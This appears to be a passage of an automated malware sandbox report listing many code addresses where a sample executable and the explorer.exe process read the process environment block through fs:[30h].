          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016737F5 mov eax, dword ptr fs:[00000030h]6_2_016737F5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01648794 mov eax, dword ptr fs:[00000030h]6_2_01648794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]6_2_016B7794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]6_2_016B7794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]6_2_016B7794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164766D mov eax, dword ptr fs:[00000030h]6_2_0164766D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAE44 mov eax, dword ptr fs:[00000030h]6_2_016FAE44
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAE44 mov eax, dword ptr fs:[00000030h]6_2_016FAE44
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163E620 mov eax, dword ptr fs:[00000030h]6_2_0163E620
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EFE3F mov eax, dword ptr fs:[00000030h]6_2_016EFE3F
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]6_2_0163C600
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]6_2_0163C600
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]6_2_0163C600
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01668E00 mov eax, dword ptr fs:[00000030h]6_2_01668E00
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1608 mov eax, dword ptr fs:[00000030h]6_2_016F1608
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A61C mov eax, dword ptr fs:[00000030h]6_2_0166A61C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A61C mov eax, dword ptr fs:[00000030h]6_2_0166A61C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016616E0 mov ecx, dword ptr fs:[00000030h]6_2_016616E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016476E2 mov eax, dword ptr fs:[00000030h]6_2_016476E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01678EC7 mov eax, dword ptr fs:[00000030h]6_2_01678EC7
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708ED6 mov eax, dword ptr fs:[00000030h]6_2_01708ED6
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016636CC mov eax, dword ptr fs:[00000030h]6_2_016636CC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EFEC0 mov eax, dword ptr fs:[00000030h]6_2_016EFEC0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B46A7 mov eax, dword ptr fs:[00000030h]6_2_016B46A7
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]6_2_01700EA5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]6_2_01700EA5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]6_2_01700EA5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFE87 mov eax, dword ptr fs:[00000030h]6_2_016CFE87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039100 mov eax, dword ptr fs:[00000030h]11_2_05039100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039100 mov eax, dword ptr fs:[00000030h]11_2_05039100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039100 mov eax, dword ptr fs:[00000030h]11_2_05039100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108D34 mov eax, dword ptr fs:[00000030h]11_2_05108D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]11_2_05054120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]11_2_05054120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]11_2_05054120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]11_2_05054120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov ecx, dword ptr fs:[00000030h]11_2_05054120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]11_2_05043D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AD30 mov eax, dword ptr fs:[00000030h]11_2_0503AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FE539 mov eax, dword ptr fs:[00000030h]11_2_050FE539
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506513A mov eax, dword ptr fs:[00000030h]11_2_0506513A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506513A mov eax, dword ptr fs:[00000030h]11_2_0506513A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050BA537 mov eax, dword ptr fs:[00000030h]11_2_050BA537
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064D3B mov eax, dword ptr fs:[00000030h]11_2_05064D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064D3B mov eax, dword ptr fs:[00000030h]11_2_05064D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064D3B mov eax, dword ptr fs:[00000030h]11_2_05064D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505B944 mov eax, dword ptr fs:[00000030h]11_2_0505B944
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505B944 mov eax, dword ptr fs:[00000030h]11_2_0505B944
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05073D43 mov eax, dword ptr fs:[00000030h]11_2_05073D43
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3540 mov eax, dword ptr fs:[00000030h]11_2_050B3540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05057D50 mov eax, dword ptr fs:[00000030h]11_2_05057D50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C962 mov eax, dword ptr fs:[00000030h]11_2_0503C962
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B171 mov eax, dword ptr fs:[00000030h]11_2_0503B171
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B171 mov eax, dword ptr fs:[00000030h]11_2_0503B171
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505C577 mov eax, dword ptr fs:[00000030h]11_2_0505C577
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505C577 mov eax, dword ptr fs:[00000030h]11_2_0505C577
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A185 mov eax, dword ptr fs:[00000030h]11_2_0506A185
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505C182 mov eax, dword ptr fs:[00000030h]11_2_0505C182
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]11_2_05062581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]11_2_05062581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]11_2_05062581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]11_2_05062581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]11_2_05032D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]11_2_05032D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]11_2_05032D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]11_2_05032D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]11_2_05032D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062990 mov eax, dword ptr fs:[00000030h]11_2_05062990
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506FD9B mov eax, dword ptr fs:[00000030h]11_2_0506FD9B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506FD9B mov eax, dword ptr fs:[00000030h]11_2_0506FD9B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050661A0 mov eax, dword ptr fs:[00000030h]11_2_050661A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050661A0 mov eax, dword ptr fs:[00000030h]11_2_050661A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050635A1 mov eax, dword ptr fs:[00000030h]11_2_050635A1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B69A6 mov eax, dword ptr fs:[00000030h]11_2_050B69A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05061DB5 mov eax, dword ptr fs:[00000030h]11_2_05061DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05061DB5 mov eax, dword ptr fs:[00000030h]11_2_05061DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05061DB5 mov eax, dword ptr fs:[00000030h]11_2_05061DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]11_2_050B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]11_2_050B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]11_2_050B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]11_2_050B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051005AC mov eax, dword ptr fs:[00000030h]11_2_051005AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051005AC mov eax, dword ptr fs:[00000030h]11_2_051005AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]11_2_050B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]11_2_050B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]11_2_050B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov ecx, dword ptr fs:[00000030h]11_2_050B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]11_2_050B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]11_2_050B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B1E1 mov eax, dword ptr fs:[00000030h]11_2_0503B1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B1E1 mov eax, dword ptr fs:[00000030h]11_2_0503B1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B1E1 mov eax, dword ptr fs:[00000030h]11_2_0503B1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050C41E8 mov eax, dword ptr fs:[00000030h]11_2_050C41E8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504D5E0 mov eax, dword ptr fs:[00000030h]11_2_0504D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504D5E0 mov eax, dword ptr fs:[00000030h]11_2_0504D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]11_2_050FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]11_2_050FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]11_2_050FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]11_2_050FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050E8DF1 mov eax, dword ptr fs:[00000030h]11_2_050E8DF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]11_2_050B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]11_2_050B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]11_2_050B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]11_2_050B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05104015 mov eax, dword ptr fs:[00000030h]11_2_05104015
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05104015 mov eax, dword ptr fs:[00000030h]11_2_05104015
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]11_2_050F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7016 mov eax, dword ptr fs:[00000030h]11_2_050B7016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7016 mov eax, dword ptr fs:[00000030h]11_2_050B7016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7016 mov eax, dword ptr fs:[00000030h]11_2_050B7016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510740D mov eax, dword ptr fs:[00000030h]11_2_0510740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510740D mov eax, dword ptr fs:[00000030h]11_2_0510740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510740D mov eax, dword ptr fs:[00000030h]11_2_0510740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506BC2C mov eax, dword ptr fs:[00000030h]11_2_0506BC2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]11_2_0506002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]11_2_0506002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]11_2_0506002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]11_2_0506002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]11_2_0506002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]11_2_0504B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]11_2_0504B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]11_2_0504B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]11_2_0504B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A44B mov eax, dword ptr fs:[00000030h]11_2_0506A44B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05050050 mov eax, dword ptr fs:[00000030h]11_2_05050050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05050050 mov eax, dword ptr fs:[00000030h]11_2_05050050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CC450 mov eax, dword ptr fs:[00000030h]11_2_050CC450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CC450 mov eax, dword ptr fs:[00000030h]11_2_050CC450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05101074 mov eax, dword ptr fs:[00000030h]11_2_05101074
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505746D mov eax, dword ptr fs:[00000030h]11_2_0505746D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F2073 mov eax, dword ptr fs:[00000030h]11_2_050F2073
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039080 mov eax, dword ptr fs:[00000030h]11_2_05039080
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3884 mov eax, dword ptr fs:[00000030h]11_2_050B3884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3884 mov eax, dword ptr fs:[00000030h]11_2_050B3884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504849B mov eax, dword ptr fs:[00000030h]11_2_0504849B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050790AF mov eax, dword ptr fs:[00000030h]11_2_050790AF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov ecx, dword ptr fs:[00000030h]11_2_0506F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov eax, dword ptr fs:[00000030h]11_2_0506F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov eax, dword ptr fs:[00000030h]11_2_0506F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108CD6 mov eax, dword ptr fs:[00000030h]11_2_05108CD6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov ecx, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050358EC mov eax, dword ptr fs:[00000030h]11_2_050358EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F14FB mov eax, dword ptr fs:[00000030h]11_2_050F14FB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]11_2_050B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]11_2_050B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]11_2_050B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A70E mov eax, dword ptr fs:[00000030h]11_2_0506A70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A70E mov eax, dword ptr fs:[00000030h]11_2_0506A70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505F716 mov eax, dword ptr fs:[00000030h]11_2_0505F716
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F131B mov eax, dword ptr fs:[00000030h]11_2_050F131B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CFF10 mov eax, dword ptr fs:[00000030h]11_2_050CFF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CFF10 mov eax, dword ptr fs:[00000030h]11_2_050CFF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510070D mov eax, dword ptr fs:[00000030h]11_2_0510070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510070D mov eax, dword ptr fs:[00000030h]11_2_0510070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05034F2E mov eax, dword ptr fs:[00000030h]11_2_05034F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05034F2E mov eax, dword ptr fs:[00000030h]11_2_05034F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506E730 mov eax, dword ptr fs:[00000030h]11_2_0506E730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503DB40 mov eax, dword ptr fs:[00000030h]11_2_0503DB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504EF40 mov eax, dword ptr fs:[00000030h]11_2_0504EF40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108B58 mov eax, dword ptr fs:[00000030h]11_2_05108B58
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503F358 mov eax, dword ptr fs:[00000030h]11_2_0503F358
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503DB60 mov ecx, dword ptr fs:[00000030h]11_2_0503DB60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504FF60 mov eax, dword ptr fs:[00000030h]11_2_0504FF60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108F6A mov eax, dword ptr fs:[00000030h]11_2_05108F6A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05063B7A mov eax, dword ptr fs:[00000030h]11_2_05063B7A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05063B7A mov eax, dword ptr fs:[00000030h]11_2_05063B7A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F138A mov eax, dword ptr fs:[00000030h]11_2_050F138A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05041B8F mov eax, dword ptr fs:[00000030h]11_2_05041B8F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05041B8F mov eax, dword ptr fs:[00000030h]11_2_05041B8F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050ED380 mov ecx, dword ptr fs:[00000030h]11_2_050ED380
